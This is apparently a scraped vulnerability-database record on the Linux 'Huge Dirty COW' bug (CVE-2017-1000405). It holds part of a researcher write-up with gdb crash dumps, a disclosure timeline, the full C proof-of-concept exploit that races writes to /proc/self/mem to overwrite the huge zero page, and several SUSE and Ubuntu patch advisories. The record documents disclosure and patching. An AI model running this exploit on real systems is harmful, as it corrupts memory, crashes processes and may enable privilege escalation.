[memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_3 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:13:56", "published": "2017-12-14T21:13:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00063.html", "id": "SUSE-SU-2017:3319-1", "title": "Security update for the Linux Kernel (Live Patch 1 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-92_45 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:09:20", "published": "2017-12-14T15:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00032.html", "id": "SUSE-SU-2017:3285-1", "title": "Security update for the Linux Kernel (Live Patch 14 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_35 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:16:46", "published": "2017-12-14T15:16:46", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00041.html", "id": "SUSE-SU-2017:3295-1", "title": "Security update for the Linux Kernel (Live Patch 12 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:18:39", "published": "2017-12-14T15:18:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00043.html", "id": "SUSE-SU-2017:3297-1", "title": "Security update for the Linux Kernel (Live Patch 13 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:08:45", "published": "2017-12-06T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00011.html", "id": "SUSE-SU-2017:3225-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:09:39", "published": "2017-12-06T21:09:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00012.html", "id": "SUSE-SU-2017:3226-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-6_12 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n", "edition": 1, "modified": "2017-12-14T21:12:53", "published": "2017-12-14T21:12:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00061.html", "id": "SUSE-SU-2017:3317-1", "title": "Security update for the Linux Kernel (Live Patch 4 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_32 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:08:28", "published": "2017-12-14T15:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00031.html", "id": "SUSE-SU-2017:3284-1", "title": "Security update for the Linux Kernel (Live Patch 11 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_9 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:10:51", "published": "2017-12-14T21:10:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00058.html", "id": "SUSE-SU-2017:3314-1", "title": "Security update for the Linux Kernel (Live Patch 3 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_29 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:20:54", "published": "2017-12-14T15:20:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00045.html", "id": "SUSE-SU-2017:3300-1", "title": "Security update for the Linux Kernel (Live Patch 10 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:43:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3510-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 7, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-2", "href": "https://ubuntu.com/security/notices/USN-3510-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- 